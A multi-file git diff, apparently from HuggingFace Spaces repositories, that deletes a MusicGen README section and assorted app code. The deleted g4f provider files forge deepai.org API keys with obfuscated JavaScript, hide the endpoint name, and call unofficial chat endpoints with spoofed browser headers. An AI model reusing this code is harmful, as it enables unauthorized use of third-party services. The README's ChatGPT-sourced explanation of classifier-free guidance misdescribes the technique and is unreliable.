page][musicgen_samples] or test the available demo! - - - Open In Colab - - - Open in HugginFace - -
- -We use 20K hours of licensed music to train MusicGen. Specifically, we rely on an internal dataset of 10K high-quality music tracks, and on the ShutterStock and Pond5 music data. - -## Installation -Audiocraft requires Python 3.9, PyTorch 2.0.0, and a GPU with at least 16 GB of memory (for the medium-sized model). To install Audiocraft, you can run the following: - -```shell -# Best to make sure you have torch installed first, in particular before installing xformers. -# Don't run this if you already have PyTorch installed. -pip install 'torch>=2.0' -# Then proceed to one of the following -pip install -U audiocraft # stable release -pip install -U git+https://git@github.com/facebookresearch/audiocraft#egg=audiocraft # bleeding edge -pip install -e . # or if you cloned the repo locally -``` - -## Usage -We offer a number of way to interact with MusicGen: -1. A demo is also available on the [`facebook/MusicGen` HuggingFace Space](https://huggingface.co/spaces/facebook/MusicGen) (huge thanks to all the HF team for their support). -2. You can run the Gradio demo in Colab: [colab notebook](https://colab.research.google.com/drive/1-Xe9NCdIs2sCUbiSmwHXozK6AAhMm7_i?usp=sharing). -3. You can use the gradio demo locally by running `python app.py`. -4. You can play with MusicGen by running the jupyter notebook at [`demo.ipynb`](./demo.ipynb) locally (if you have a GPU). -5. Checkout [@camenduru Colab page](https://github.com/camenduru/MusicGen-colab) which is regularly - updated with contributions from @camenduru and the community. -6. Finally, MusicGen is available in 🤗 Transformers from v4.31.0 onwards, see section [🤗 Transformers Usage](#-transformers-usage) below. - -### More info about Top-k, Top-p, Temperature and Classifier Free Guidance from ChatGPT -6. Finally, MusicGen is available in 🤗 Transformers from v4.31.0 onwards, see section [🤗 Transformers Usage](#-transformers-usage) below. - - -Top-k: Top-k is a parameter used in text generation models, including music generation models. It determines the number of most likely next tokens to consider at each step of the generation process. The model ranks all possible tokens based on their predicted probabilities, and then selects the top-k tokens from the ranked list. The model then samples from this reduced set of tokens to determine the next token in the generated sequence. A smaller value of k results in a more focused and deterministic output, while a larger value of k allows for more diversity in the generated music. - -Top-p (or nucleus sampling): Top-p, also known as nucleus sampling or probabilistic sampling, is another method used for token selection during text generation. Instead of specifying a fixed number like top-k, top-p considers the cumulative probability distribution of the ranked tokens. It selects the smallest possible set of tokens whose cumulative probability exceeds a certain threshold (usually denoted as p). The model then samples from this set to choose the next token. This approach ensures that the generated output maintains a balance between diversity and coherence, as it allows for a varying number of tokens to be considered based on their probabilities. - -Temperature: Temperature is a parameter that controls the randomness of the generated output. It is applied during the sampling process, where a higher temperature value results in more random and diverse outputs, while a lower temperature value leads to more deterministic and focused outputs. In the context of music generation, a higher temperature can introduce more variability and creativity into the generated music, but it may also lead to less coherent or structured compositions. On the other hand, a lower temperature can produce more repetitive and predictable music. - -Classifier-Free Guidance: Classifier-Free Guidance refers to a technique used in some music generation models where a separate classifier network is trained to provide guidance or control over the generated music. This classifier is trained on labeled data to recognize specific musical characteristics or styles. During the generation process, the output of the generator model is evaluated by the classifier, and the generator is encouraged to produce music that aligns with the desired characteristics or style. This approach allows for more fine-grained control over the generated music, enabling users to specify certain attributes they want the model to capture. - -These parameters, such as top-k, top-p, temperature, and classifier-free guidance, provide different ways to influence the output of a music generation model and strike a balance between creativity, diversity, coherence, and control. The specific values for these parameters can be tuned based on the desired outcome and user preferences. - -## API - -We provide a simple API and 4 pre-trained models. The pre trained models are: -- `small`: 300M model, text to music only - [🤗 Hub](https://huggingface.co/facebook/musicgen-small) -- `medium`: 1.5B model, text to music only - [🤗 Hub](https://huggingface.co/facebook/musicgen-medium) -- `melody`: 1.5B model, text to music and text+melody to music - [🤗 Hub](https://huggingface.co/facebook/musicgen-melody) -- `large`: 3.3B model, text to music only - [🤗 Hub](https://huggingface.co/facebook/musicgen-large) - -We observe the best trade-off between quality and compute with the `medium` or `melody` model. -In order to use MusicGen locally **you must have a GPU**. We recommend 16GB of memory, but smaller -GPUs will be able to generate short sequences, or longer sequences with the `small` model. - -**Note**: Please make sure to have [ffmpeg](https://ffmpeg.org/download.html) installed when using newer version of `torchaudio`. -You can install it with: -``` -apt-get install ffmpeg -``` - -See after a quick example for using the API. - -```python -import torchaudio -from audiocraft.models import MusicGen -from audiocraft.data.audio import audio_write - -model = MusicGen.get_pretrained('melody') -model.set_generation_params(duration=8) # generate 8 seconds. -wav = model.generate_unconditional(4) # generates 4 unconditional audio samples -descriptions = ['happy rock', 'energetic EDM', 'sad jazz'] -wav = model.generate(descriptions) # generates 3 samples. - -melody, sr = torchaudio.load('./assets/bach.mp3') -# generates using the melody from the given audio and the provided descriptions. -wav = model.generate_with_chroma(descriptions, melody[None].expand(3, -1, -1), sr) - -for idx, one_wav in enumerate(wav): - # Will save under {idx}.wav, with loudness normalization at -14 db LUFS. - audio_write(f'{idx}', one_wav.cpu(), model.sample_rate, strategy="loudness", loudness_compressor=True) -``` -## 🤗 Transformers Usage - -MusicGen is available in the 🤗 Transformers library from version 4.31.0 onwards, requiring minimal dependencies -and additional packages. Steps to get started: - -1. First install the 🤗 [Transformers library](https://github.com/huggingface/transformers) from main: - -``` -pip install git+https://github.com/huggingface/transformers.git -``` - -2. Run the following Python code to generate text-conditional audio samples: - -```py -from transformers import AutoProcessor, MusicgenForConditionalGeneration - - -processor = AutoProcessor.from_pretrained("facebook/musicgen-small") -model = MusicgenForConditionalGeneration.from_pretrained("facebook/musicgen-small") - -inputs = processor( - text=["80s pop track with bassy drums and synth", "90s rock song with loud guitars and heavy drums"], - padding=True, - return_tensors="pt", -) - -audio_values = model.generate(**inputs, max_new_tokens=256) -``` - -3. Listen to the audio samples either in an ipynb notebook: - -```py -from IPython.display import Audio - -sampling_rate = model.config.audio_encoder.sampling_rate -Audio(audio_values[0].numpy(), rate=sampling_rate) -``` - -Or save them as a `.wav` file using a third-party library, e.g. `scipy`: - -```py -import scipy - -sampling_rate = model.config.audio_encoder.sampling_rate -scipy.io.wavfile.write("musicgen_out.wav", rate=sampling_rate, data=audio_values[0, 0].numpy()) -``` - -For more details on using the MusicGen model for inference using the 🤗 Transformers library, refer to the -[MusicGen docs](https://huggingface.co/docs/transformers/main/en/model_doc/musicgen) or the hands-on -[Google Colab](https://colab.research.google.com/github/sanchit-gandhi/notebooks/blob/main/MusicGen.ipynb). - - -## Model Card - -See [the model card page](./MODEL_CARD.md). - -## FAQ - -#### Will the training code be released? - -Yes. We will soon release the training code for MusicGen and EnCodec. - - -#### I need help on Windows - -@FurkanGozukara made a complete tutorial for [Audiocraft/MusicGen on Windows](https://youtu.be/v-YpvPkhdO4) - -#### I need help for running the demo on Colab - -Check [@camenduru tutorial on Youtube](https://www.youtube.com/watch?v=EGfxuTy9Eeo). - -## Citation -``` -@article{copet2023simple, - title={Simple and Controllable Music Generation}, - author={Jade Copet and Felix Kreuk and Itai Gat and Tal Remez and David Kant and Gabriel Synnaeve and Yossi Adi and Alexandre Défossez}, - year={2023}, - journal={arXiv preprint arXiv:2306.05284}, -} -``` - -## License -* The code in this repository is released under the MIT license as found in the [LICENSE file](LICENSE). -* The weights in this repository are released under the CC-BY-NC 4.0 license as found in the [LICENSE_weights file](LICENSE_weights). -[arxiv]: https://arxiv.org/abs/2306.05284 -[musicgen_samples]: https://ai.honu.io/papers/musicgen/ \ No newline at end of file diff --git a/spaces/AchyuthGamer/OpenGPT-Chat-UI/src/lib/utils/sum.ts b/spaces/AchyuthGamer/OpenGPT-Chat-UI/src/lib/utils/sum.ts deleted file mode 100644 index 289b70584ef9f7795b1f4b1bf0151237dc2c55ff..0000000000000000000000000000000000000000 --- a/spaces/AchyuthGamer/OpenGPT-Chat-UI/src/lib/utils/sum.ts +++ /dev/null @@ -1,3 +0,0 @@ -export function sum(nums: number[]): number { - return nums.reduce((a, b) => a + b, 0); -} diff --git a/spaces/AchyuthGamer/OpenGPT/g4f/Provider/DeepAi.py b/spaces/AchyuthGamer/OpenGPT/g4f/Provider/DeepAi.py deleted file mode 100644 index bac3e3fe64b34d9ce2e5465ff99e84c7b2cf5411..0000000000000000000000000000000000000000 --- a/spaces/AchyuthGamer/OpenGPT/g4f/Provider/DeepAi.py +++ /dev/null @@ -1,77 +0,0 @@ -from __future__ import annotations - -import json -import js2py -import random -import hashlib -from aiohttp import ClientSession - -from ..typing import AsyncGenerator -from .base_provider import AsyncGeneratorProvider - - -class DeepAi(AsyncGeneratorProvider): - url: str = "https://deepai.org" - working = True - supports_gpt_35_turbo = True - - @staticmethod - async def create_async_generator( - model: str, - messages: list[dict[str, str]], - proxy: str = None, - **kwargs - ) -> AsyncGenerator: - - token_js = """ -var agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36' -var a, b, c, d, e, h, f, l, g, k, m, n, r, x, C, E, N, F, T, O, P, w, D, G, Q, R, W, I, aa, fa, na, oa, ha, ba, X, ia, ja, ka, J, la, K, L, ca, S, U, M, ma, B, da, V, Y; -h = Math.round(1E11 * Math.random()) + ""; -f = function () { - for (var p = [], q = 0; 64 > q;) p[q] = 0 | 4294967296 * Math.sin(++q % Math.PI); - - return function (t) { - var v, y, H, ea = [v = 1732584193, y = 4023233417, ~v, ~y], - Z = [], - A = unescape(encodeURI(t)) + "\u0080", - z = A.length; - t = --z / 4 + 2 | 15; - for (Z[--t] = 8 * z; ~z;) Z[z >> 2] |= A.charCodeAt(z) << 8 * z--; - for (q = A = 0; q < t; q += 16) { - for (z = ea; 64 > A; z = [H = z[3], v + ((H = z[0] + [v & y | ~v & H, H & v | ~H & y, v ^ y ^ H, y ^ (v | ~H)][z = A >> 4] + p[A] + ~~Z[q | [A, 5 * A + 1, 3 * A + 5, 7 * A][z] & 15]) << (z = [7, 12, 17, 22, 5, 9, 14, 20, 4, 11, 16, 23, 6, 10, 15, 21][4 * z + A++ % 4]) | H >>> -z), v, y]) v = z[1] | 0, y = z[2]; - for (A = 4; A;) ea[--A] += z[A] - } - for (t = ""; 32 > A;) t += (ea[A >> 3] >> 4 * (1 ^ A++) & 15).toString(16); - return t.split("").reverse().join("") - } -}(); - -"tryit-" + h + "-" + f(agent + f(agent + f(agent + h + "x"))); -""" - - payload = {"chat_style": "chat", "chatHistory": json.dumps(messages)} - api_key = js2py.eval_js(token_js) - headers = { - "api-key": api_key, - "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36", - **kwargs.get("headers", {}) - } - async with ClientSession( - headers=headers - ) as session: - fill = "ing_is" - fill = f"ack{fill}_a_crim" - async with session.post(f"https://api.deepai.org/h{fill}e", proxy=proxy, data=payload) as response: - response.raise_for_status() - async for stream in response.content.iter_any(): - if stream: - yield stream.decode() - - -def get_api_key(user_agent: str): - e = str(round(1E11 * random.random())) - - def hash(data: str): - return hashlib.md5(data.encode()).hexdigest()[::-1] - - return f"tryit-{e}-" + hash(user_agent + hash(user_agent + hash(user_agent + e + "x"))) \ No newline at end of file diff --git a/spaces/AchyuthGamer/OpenGPT/g4f/Provider/Providers/ChatFree.py b/spaces/AchyuthGamer/OpenGPT/g4f/Provider/Providers/ChatFree.py deleted file mode 100644 index 6bbaebaed35681026ff1eeb8eee3270e3b0741fd..0000000000000000000000000000000000000000 --- a/spaces/AchyuthGamer/OpenGPT/g4f/Provider/Providers/ChatFree.py +++ /dev/null @@ -1,48 +0,0 @@ -import os, requests -from ...typing import sha256, Dict, get_type_hints -import json - -url = "https://v.chatfree.cc" -model = ['gpt-3.5-turbo', 'gpt-3.5-turbo-16k'] -supports_stream = False -needs_auth = False - - -def _create_completion(model: str, messages: list, stream: bool, **kwargs): - headers = { - 'authority': 'chat.dfehub.com', - 'accept': '*/*', - 'accept-language': 'en,fr-FR;q=0.9,fr;q=0.8,es-ES;q=0.7,es;q=0.6,en-US;q=0.5,am;q=0.4,de;q=0.3', - 'content-type': 'application/json', - 'origin': 'https://v.chatfree.cc', - 'referer': 'https://v.chatfree.cc/', - 'sec-ch-ua': '"Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"', - 'sec-ch-ua-mobile': '?0', - 'sec-ch-ua-platform': '"macOS"', - 'sec-fetch-dest': 'empty', - 'sec-fetch-mode': 'cors', - 'sec-fetch-site': 'same-origin', - 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36', - 'x-requested-with': 'XMLHttpRequest', - } - - json_data = { - 'messages': messages, - 'stream': True, - 'model': model, - 'temperature': 0.5, - 'presence_penalty': 0, - 'frequency_penalty': 0, - 'top_p': 1, - } - - response = requests.post('https://v.chatfree.cc/api/openai/v1/chat/completions', - headers=headers, json=json_data) - - for chunk in response.iter_lines(): - if b'content' in chunk: - data = json.loads(chunk.decode().split('data: ')[1]) - yield (data['choices'][0]['delta']['content']) - -params = f'g4f.Providers.{os.path.basename(__file__)[:-3]} supports: ' + \ - '(%s)' % ', '.join([f"{name}: {get_type_hints(_create_completion)[name].__name__}" for name in _create_completion.__code__.co_varnames[:_create_completion.__code__.co_argcount]]) \ No newline at end of file diff --git a/spaces/AchyuthGamer/OpenGPT/g4f/Provider/Providers/Ezcht.py b/spaces/AchyuthGamer/OpenGPT/g4f/Provider/Providers/Ezcht.py deleted file mode 100644 index baec214f7e0e936ea06bffa357e1bd2b77cd4089..0000000000000000000000000000000000000000 --- a/spaces/AchyuthGamer/OpenGPT/g4f/Provider/Providers/Ezcht.py +++ /dev/null @@ -1,35 +0,0 @@ -import requests -import os -import json -from ...typing import sha256, Dict, get_type_hints - -url = 'https://gpt4.ezchat.top' -model = ['gpt-3.5-turbo', 'gpt-3.5-turbo-16k', 'gpt-3.5-turbo-16k-0613', 'gpt-3.5-turbo-0613'] -supports_stream = True -needs_auth = False - -def _create_completion(model: str, messages: list, stream: bool, temperature: float = 0.7, **kwargs): - headers = { - 'Content-Type': 'application/json', - } - data = { - 'model': model, - 'temperature': 0.7, - 'presence_penalty': 0, - 'messages': messages, - } - response = requests.post(url + '/api/openai/v1/chat/completions', - json=data, stream=True) - - if stream: - for chunk in response.iter_content(chunk_size=None): - chunk = chunk.decode('utf-8') - if chunk.strip(): - message = json.loads(chunk)['choices'][0]['message']['content'] - yield message - else: - message = response.json()['choices'][0]['message']['content'] - yield message - -params = f'g4f.Providers.{os.path.basename(__file__)[:-3]} supports: ' + \ - '(%s)' % ', '.join([f"{name}: {get_type_hints(_create_completion)[name].__name__}" for name in _create_completion.__code__.co_varnames[:_create_completion.__code__.co_argcount]]) \ No newline at end of file diff --git a/spaces/AgentVerse/agentVerse/ui/src/phaser3-rex-plugins/templates/spinner/los/Factory.js b/spaces/AgentVerse/agentVerse/ui/src/phaser3-rex-plugins/templates/spinner/los/Factory.js deleted file mode 100644 index 92ec48bc7c36d6c3bbc482e7159b653f7d2ff8c6..0000000000000000000000000000000000000000 --- a/spaces/AgentVerse/agentVerse/ui/src/phaser3-rex-plugins/templates/spinner/los/Factory.js +++ /dev/null @@ -1,13 +0,0 @@ -import Los from './Los.js'; -import ObjectFactory from '../ObjectFactory.js'; -import SetValue from '../../../plugins/utils/object/SetValue.js'; - -ObjectFactory.register('los', function (config) { - var gameObject = new Los(this.scene, config); - this.scene.add.existing(gameObject); - return gameObject; -}); - -SetValue(window, 'RexPlugins.Spinner.Los', Los); - -export default Los; \ No newline at end of file diff --git a/spaces/AgentVerse/agentVerse/ui/src/phaser3-rex-plugins/templates/spinner/orbit/Factory.js b/spaces/AgentVerse/agentVerse/ui/src/phaser3-rex-plugins/templates/spinner/orbit/Factory.js deleted file mode 100644 index f182c5c5b04cd0fcbc25acb052d253e1fc0a8e5d..0000000000000000000000000000000000000000 --- a/spaces/AgentVerse/agentVerse/ui/src/phaser3-rex-plugins/templates/spinner/orbit/Factory.js +++ /dev/null @@ -1,13 +0,0 @@ -import Orbit from './Orbit.js'; -import ObjectFactory from '../ObjectFactory.js'; -import SetValue from '../../../plugins/utils/object/SetValue.js'; - -ObjectFactory.register('orbit', function (config) { - var gameObject = new Orbit(this.scene, config); - this.scene.add.existing(gameObject); - return gameObject; -}); - -SetValue(window, 'RexPlugins.Spinner.Orbit', Orbit); - -export default Orbit; \ No newline at end of file diff --git a/spaces/AlexWortega/ruImageCaptionong/app.py b/spaces/AlexWortega/ruImageCaptionong/app.py deleted file mode 100644 index f82d06d98568e5ab1fbff5f47620d4a989212e3e..0000000000000000000000000000000000000000 --- a/spaces/AlexWortega/ruImageCaptionong/app.py +++ /dev/null @@ -1,198 +0,0 @@ -import torch - - -import sys - - -import gradio as gr - -from PIL import Image - -device = 'cpu' -import clip -import os -from torch import nn -import numpy as np -import torch -import torch.nn.functional as nnf -import sys -from transformers import GPT2Tokenizer, GPT2LMHeadModel -from tqdm import tqdm, trange -import PIL.Image -#ggf - -import transformers - -device = 'cuda' if torch.cuda.is_available() else 'cpu' - -model_path = 'coco_prefix_latest.pt' - - - - - -class MLP(nn.Module): - - def forward(self, x): - return self.model(x) - - def __init__(self, sizes, bias=True, act=nn.Tanh): - super(MLP, self).__init__() - layers = [] - for i in range(len(sizes) -1): - layers.append(nn.Linear(sizes[i], sizes[i + 1], bias=bias)) - if i < len(sizes) - 2: - layers.append(act()) - self.model = nn.Sequential(*layers) - - -class ClipCaptionModel(nn.Module): - - #@functools.lru_cache #FIXME - def get_dummy_token(self, batch_size, device): - return torch.zeros(batch_size, self.prefix_length, dtype=torch.int64, device=device) - - def forward(self, tokens, prefix, mask, labels): - embedding_text = self.gpt.transformer.wte(tokens) - prefix_projections = self.clip_project(prefix).view(-1, self.prefix_length, self.gpt_embedding_size) - #print(embedding_text.size()) #torch.Size([5, 67, 768]) - #print(prefix_projections.size()) #torch.Size([5, 1, 768]) - embedding_cat = torch.cat((prefix_projections, embedding_text), dim=1) - if labels is not None: - dummy_token = self.get_dummy_token(tokens.shape[0], tokens.device) - labels = torch.cat((dummy_token, tokens), dim=1) - out = self.gpt(inputs_embeds=embedding_cat, labels=labels, attention_mask=mask) - return out - - def __init__(self, prefix_length, prefix_size: int = 512): - super(ClipCaptionModel, self).__init__() - self.prefix_length = prefix_length - - self.gpt = GPT2LMHeadModel.from_pretrained('sberbank-ai/rugpt3small_based_on_gpt2') - - self.gpt_embedding_size = self.gpt.transformer.wte.weight.shape[1] - if prefix_length > 10: # not enough memory - self.clip_project = nn.Linear(prefix_size, self.gpt_embedding_size * prefix_length) - else: - self.clip_project = MLP((prefix_size, (self.gpt_embedding_size * prefix_length) // 2, self.gpt_embedding_size * prefix_length)) - - -class ClipCaptionPrefix(ClipCaptionModel): - - def parameters(self, recurse: bool = True): - return self.clip_project.parameters() - - def train(self, mode: bool = True): - super(ClipCaptionPrefix, self).train(mode) - self.gpt.eval() - return self - - - -clip_model, preprocess = clip.load("ViT-B/32", device=device, jit=False) -tokenizer = GPT2Tokenizer.from_pretrained('sberbank-ai/rugpt3small_based_on_gpt2') -prefix_length = 10 -model = ClipCaptionModel(prefix_length) -model.load_state_dict(torch.load(model_path, map_location='cpu')) -model.to(device) -def generate2( - model, - tokenizer, - tokens=None, - prompt=None, - embed=None, - entry_count=1, - entry_length=67, - top_p=0.98, - temperature=1., - stop_token = '.', -): - model.eval() - generated_num = 0 - generated_list = [] - stop_token_index = tokenizer.encode(stop_token)[0] - filter_value = -float("Inf") - device = next(model.parameters()).device - - with torch.no_grad(): - - for entry_idx in trange(entry_count): - if embed is not None: - generated = embed - else: - if tokens is None: - tokens = torch.tensor(tokenizer.encode(prompt)) - tokens = tokens.unsqueeze(0).to(device) - - generated = model.gpt.transformer.wte(tokens) - - for i in range(entry_length): - - outputs = model.gpt(inputs_embeds=generated) - logits = outputs.logits - logits = logits[:, -1, :] / (temperature if temperature > 0 else 1.0) - sorted_logits, sorted_indices = torch.sort(logits, descending=True) - cumulative_probs = torch.cumsum(nnf.softmax(sorted_logits, dim=-1), dim=-1) - sorted_indices_to_remove = cumulative_probs > top_p - sorted_indices_to_remove[..., 1:] = sorted_indices_to_remove[ - ..., :-1 - ].clone() - sorted_indices_to_remove[..., 0] = 0 - - indices_to_remove = sorted_indices[sorted_indices_to_remove] - logits[:, indices_to_remove] = filter_value - # - top_k = 2000 - top_p = 0.98 - #print(logits) - #next_token = transformers.top_k_top_p_filtering(logits.to(torch.int64).unsqueeze(0), top_k=top_k, top_p=top_p) - next_token = torch.argmax(logits, -1).unsqueeze(0) - next_token_embed = model.gpt.transformer.wte(next_token) - - if tokens is None: - tokens = next_token - else: - tokens = torch.cat((tokens, next_token), dim=1) - generated = torch.cat((generated, next_token_embed), dim=1) - - if stop_token_index == next_token.item(): - break - - output_list = list(tokens.squeeze().cpu().numpy()) - output_text = tokenizer.decode(output_list) - generated_list.append(output_text) - - return generated_list[0] - - - -def _to_caption(pil_image): - - image = preprocess(pil_image).unsqueeze(0).to(device) - with torch.no_grad(): - - prefix = clip_model.encode_image(image).to(device, dtype=torch.float32) - prefix_embed = model.clip_project(prefix).reshape(1, prefix_length, -1) - - generated_text_prefix = generate2(model, tokenizer, embed=prefix_embed) - return generated_text_prefix - - - -def classify_image(inp): - print(type(inp)) - inp = Image.fromarray(inp) - texts = _to_caption(inp) - - print(texts) - - - return texts - -image = gr.inputs.Image(shape=(256, 256)) -label = gr.outputs.Label(num_top_classes=3) - - -iface = gr.Interface(fn=classify_image, description="https://github.com/AlexWortega/ruImageCaptioning RuImage Captioning trained for a image2text task to predict caption of image by https://t.me/lovedeathtransformers Alex Wortega", inputs=image, outputs="text",examples=[ - ['1.jpeg']]) -iface.launch() \ No newline at end of file diff --git a/spaces/Alpaca233/SadTalker/src/utils/croper.py b/spaces/Alpaca233/SadTalker/src/utils/croper.py deleted file mode 100644 index 3d9a0ac58f97afdc95d40f2a400272b11fe38093..0000000000000000000000000000000000000000 --- a/spaces/Alpaca233/SadTalker/src/utils/croper.py +++ /dev/null @@ -1,144 +0,0 @@ -import os -import cv2 -import time -import glob -import argparse -import scipy -import numpy as np -from PIL import Image -import torch -from tqdm import tqdm -from itertools import cycle - -from src.face3d.extract_kp_videos_safe import KeypointExtractor -from facexlib.alignment import landmark_98_to_68 - -import numpy as np -from PIL import Image - -class Preprocesser: - def __init__(self, device='cuda'): - self.predictor = KeypointExtractor(device) - - def get_landmark(self, img_np): - """get landmark with dlib - :return: np.array shape=(68, 2) - """ - with torch.no_grad(): - dets = self.predictor.det_net.detect_faces(img_np, 0.97) - - if len(dets) == 0: - return None - det = dets[0] - - img = img_np[int(det[1]):int(det[3]), int(det[0]):int(det[2]), :] - lm = landmark_98_to_68(self.predictor.detector.get_landmarks(img)) # [0] - - #### keypoints to the original location - lm[:,0] += int(det[0]) - lm[:,1] += int(det[1]) - - return lm - - def align_face(self, img, lm, output_size=1024): - """ - :param filepath: str - :return: PIL Image - """ - lm_chin = lm[0: 17] # left-right - lm_eyebrow_left = lm[17: 22] # left-right - lm_eyebrow_right = lm[22: 27] # left-right - lm_nose = lm[27: 31] # top-down - lm_nostrils = lm[31: 36] # top-down - lm_eye_left = lm[36: 42] # left-clockwise - lm_eye_right = lm[42: 48] # left-clockwise - lm_mouth_outer = lm[48: 60] # left-clockwise - lm_mouth_inner = lm[60: 68] # left-clockwise - - # Calculate auxiliary vectors. - eye_left = np.mean(lm_eye_left, axis=0) - eye_right = np.mean(lm_eye_right, axis=0) - eye_avg = (eye_left + eye_right) * 0.5 - eye_to_eye = eye_right - eye_left - mouth_left = lm_mouth_outer[0] - mouth_right = lm_mouth_outer[6] - mouth_avg = (mouth_left + mouth_right) * 0.5 - eye_to_mouth = mouth_avg - eye_avg - - # Choose oriented crop rectangle. - x = eye_to_eye - np.flipud(eye_to_mouth) * [-1, 1] # Addition of binocular difference and double mouth difference - x /= np.hypot(*x) # hypot函数计算直角三角形的斜边长,用斜边长对三角形两条直边做归一化 - x *= max(np.hypot(*eye_to_eye) * 2.0, np.hypot(*eye_to_mouth) * 1.8) # 双眼差和眼嘴差,选较大的作为基准尺度 - y = np.flipud(x) * [-1, 1] - c = eye_avg + eye_to_mouth * 0.1 - quad = np.stack([c - x - y, c - x + y, c + x + y, c + x - y]) # 定义四边形,以面部基准位置为中心上下左右平移得到四个顶点 - qsize = np.hypot(*x) * 2 # 定义四边形的大小(边长),为基准尺度的2倍 - - # Shrink. - # 如果计算出的四边形太大了,就按比例缩小它 - shrink = int(np.floor(qsize / output_size * 0.5)) - if shrink > 1: - rsize = (int(np.rint(float(img.size[0]) / shrink)), int(np.rint(float(img.size[1]) / shrink))) - img = img.resize(rsize, Image.ANTIALIAS) - quad /= shrink - qsize /= shrink - else: - rsize = (int(np.rint(float(img.size[0]))), int(np.rint(float(img.size[1])))) - - # Crop. - border = max(int(np.rint(qsize * 0.1)), 3) - crop = (int(np.floor(min(quad[:, 0]))), int(np.floor(min(quad[:, 1]))), int(np.ceil(max(quad[:, 0]))), - int(np.ceil(max(quad[:, 1])))) - crop = (max(crop[0] - border, 0), max(crop[1] - border, 0), min(crop[2] + border, img.size[0]), - min(crop[3] + border, img.size[1])) - if crop[2] - crop[0] < img.size[0] or crop[3] - crop[1] < img.size[1]: - # img = img.crop(crop) - quad -= crop[0:2] - - # Pad. - pad = (int(np.floor(min(quad[:, 0]))), int(np.floor(min(quad[:, 1]))), int(np.ceil(max(quad[:, 0]))), - int(np.ceil(max(quad[:, 1])))) - pad = (max(-pad[0] + border, 0), max(-pad[1] + border, 0), max(pad[2] - img.size[0] + border, 0), - max(pad[3] - img.size[1] + border, 0)) - # if enable_padding and max(pad) > border - 4: - # pad = np.maximum(pad, int(np.rint(qsize * 0.3))) - # img = np.pad(np.float32(img), ((pad[1], pad[3]), (pad[0], pad[2]), (0, 0)), 'reflect') - # h, w, _ = img.shape - # y, x, _ = np.ogrid[:h, :w, :1] - # mask = np.maximum(1.0 - np.minimum(np.float32(x) / pad[0], np.float32(w - 1 - x) / pad[2]), - # 1.0 - np.minimum(np.float32(y) / pad[1], np.float32(h - 1 - y) / pad[3])) - # blur = qsize * 0.02 - # img += (scipy.ndimage.gaussian_filter(img, [blur, blur, 0]) - img) * np.clip(mask * 3.0 + 1.0, 0.0, 1.0) - # img += (np.median(img, axis=(0, 1)) - img) * np.clip(mask, 0.0, 1.0) - # img = Image.fromarray(np.uint8(np.clip(np.rint(img), 0, 255)), 'RGB') - # quad += pad[:2] - - # Transform. - quad = (quad + 0.5).flatten() - lx = max(min(quad[0], quad[2]), 0) - ly = max(min(quad[1], quad[7]), 0) - rx = min(max(quad[4], quad[6]), img.size[0]) - ry = min(max(quad[3], quad[5]), img.size[0]) - - # Save aligned image. - return rsize, crop, [lx, ly, rx, ry] - - def crop(self, img_np_list, still=False, xsize=512): # first frame for all video - img_np = img_np_list[0] - lm = self.get_landmark(img_np) - - if lm is None: - raise 'can not detect the landmark from source image' - rsize, crop, quad = self.align_face(img=Image.fromarray(img_np), lm=lm, output_size=xsize) - clx, cly, crx, cry = crop - lx, ly, rx, ry = quad - lx, ly, rx, ry = int(lx), int(ly), int(rx), int(ry) - for _i in range(len(img_np_list)): - _inp = img_np_list[_i] - _inp = cv2.resize(_inp, (rsize[0], rsize[1])) - _inp = _inp[cly:cry, clx:crx] - if not still: - _inp = _inp[ly:ry, lx:rx] - img_np_list[_i] = _inp - return img_np_list, crop, quad - diff --git a/spaces/Ameaou/academic-chatgpt3.1/crazy_functions/test_project/cpp/cppipc/waiter.h b/spaces/Ameaou/academic-chatgpt3.1/crazy_functions/test_project/cpp/cppipc/waiter.h deleted file mode 100644 index ee45fe3517be95ac1688a3e3540189edeb0d860c..0000000000000000000000000000000000000000 --- a/spaces/Ameaou/academic-chatgpt3.1/crazy_functions/test_project/cpp/cppipc/waiter.h +++ /dev/null @@ -1,83 +0,0 @@ -#pragma once - -#include -#include -#include -#include - -#include "libipc/def.h" -#include "libipc/mutex.h" -#include "libipc/condition.h" -#include "libipc/platform/detail.h" - -namespace ipc { -namespace detail { - -class waiter { - ipc::sync::condition cond_; - ipc::sync::mutex lock_; - std::atomic quit_ {false}; - -public: - static void init(); - - waiter() = default; - waiter(char const *name) { - open(name); - } - - ~waiter() { - close(); - } - - bool valid() const noexcept { - return cond_.valid() && lock_.valid(); - } - - bool open(char const *name) noexcept { - quit_.store(false, std::memory_order_relaxed); - if (!cond_.open((std::string{"_waiter_cond_"} + name).c_str())) { - return false; - } - if (!lock_.open((std::string{"_waiter_lock_"} + name).c_str())) { - cond_.close(); - return false; - } - return valid(); - } - - void close() noexcept { - cond_.close(); - lock_.close(); - } - - template - bool wait_if(F &&pred, std::uint64_t tm = ipc::invalid_value) noexcept { - IPC_UNUSED_ std::lock_guard guard {lock_}; - while ([this, &pred] { - return !quit_.load(std::memory_order_relaxed) - && std::forward(pred)(); - }()) { - if (!cond_.wait(lock_, tm)) return false; - } - return true; - } - - bool notify() noexcept { - std::lock_guard{lock_}; // barrier - return cond_.notify(lock_); - } - - bool broadcast() noexcept { - std::lock_guard{lock_}; // barrier - return cond_.broadcast(lock_); - } - - bool quit_waiting() { - quit_.store(true, std::memory_order_release); - return broadcast(); - } -}; - -} // namespace detail -} // namespace ipc diff --git a/spaces/Amrrs/DragGan-Inversion/stylegan_human/training/networks_stylegan2.py b/spaces/Amrrs/DragGan-Inversion/stylegan_human/training/networks_stylegan2.py deleted file mode 100644 index 923f150ef7352ed85b4be2ff8d9f8a6193aac1e9..0000000000000000000000000000000000000000 --- a/spaces/Amrrs/DragGan-Inversion/stylegan_human/training/networks_stylegan2.py +++ /dev/null @@ -1,974 +0,0 @@ -# Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved. -# -# NVIDIA CORPORATION and its licensors retain all intellectual property -# and proprietary rights in and to this software, related documentation -# and any modifications thereto. Any use, reproduction, disclosure or -# distribution of this software and related documentation 